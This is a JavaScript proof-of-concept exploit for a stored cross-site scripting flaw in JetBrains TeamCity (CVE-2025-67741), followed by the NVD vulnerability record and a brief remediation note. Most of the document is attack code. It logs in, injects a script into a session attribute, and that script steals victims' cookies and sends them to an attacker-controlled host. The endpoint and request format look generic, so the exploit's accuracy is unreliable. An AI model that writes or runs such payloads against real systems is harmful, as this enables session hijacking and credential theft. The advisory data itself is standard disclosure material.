CVE-2025-67741

// CVE-2025-67741 PoC - JetBrains TeamCity Stored XSS via Session Attribute // This PoC demonstrates how an attacker can inject malicious JavaScript through session attributes // Step 1: Login to TeamCity with a valid account const teamcityUrl = 'https://teamcity.example.com'; const credentials = { username: 'attacker', password: 'password123' }; // Step 2: Inject XSS payload into session attribute // The payload will be stored and executed when other users view the affected page const xssPayload = `<script> // Steal session cookies var cookies = document.cookie; // Send stolen data to attacker's server fetch('https://attacker.com/collect?data=' + btoa(cookies), { method: 'GET', mode: 'no-cors' }); // Alternative payload: Session hijacking console.log('Session Hijacking - Cookie:', cookies); </script>`; // Step 3: Exploit function - inject payload into session attribute async function exploitStoredXSS() { // Login to TeamCity const loginResponse = await fetch(`${teamcityUrl}/login.html`, { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded' }, body: `username=${credentials.username}&password=${credentials.password}&submit=Login` }); // Inject malicious session attribute // This targets the vulnerable session attribute parameter const injectResponse = await fetch(`${teamcityUrl}/app/session-attribute`, { method: 'POST', headers: { 'Content-Type': 'application/json', 'Cookie': loginResponse.headers.get('Set-Cookie') }, body: JSON.stringify({ name: 'userDisplayName', value: xssPayload }) }); console.log('XSS payload injected successfully'); console.log('Payload will execute when victims visit affected pages'); } // Mitigation: Update to TeamCity 2025.11 or later // The patch adds proper HTML encoding for session attributes const mitigationNote = ` REMEDIATION: 1. Upgrade JetBrains TeamCity to version 2025.11 or later 2. Review user session attributes for suspicious content 3. Implement Content Security Policy (CSP) headers 4. Enable audit logging for session attribute modifications `;

{"cve": {"id": "CVE-2025-67741", "sourceIdentifier": "[email protected]", "published": "2025-12-11T16:16:35.600", "lastModified": "2025-12-15T20:06:58.537", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In JetBrains TeamCity before 2025.11 stored XSS was possible via session attribute"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.11", "matchCriteriaId": "D80D5E22-CFD6-4363-948C-9473EFCE21A5"}]}]}], "references": [{"url": "https://www.jetbrains.com/privacy-security/issues-fixed/", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}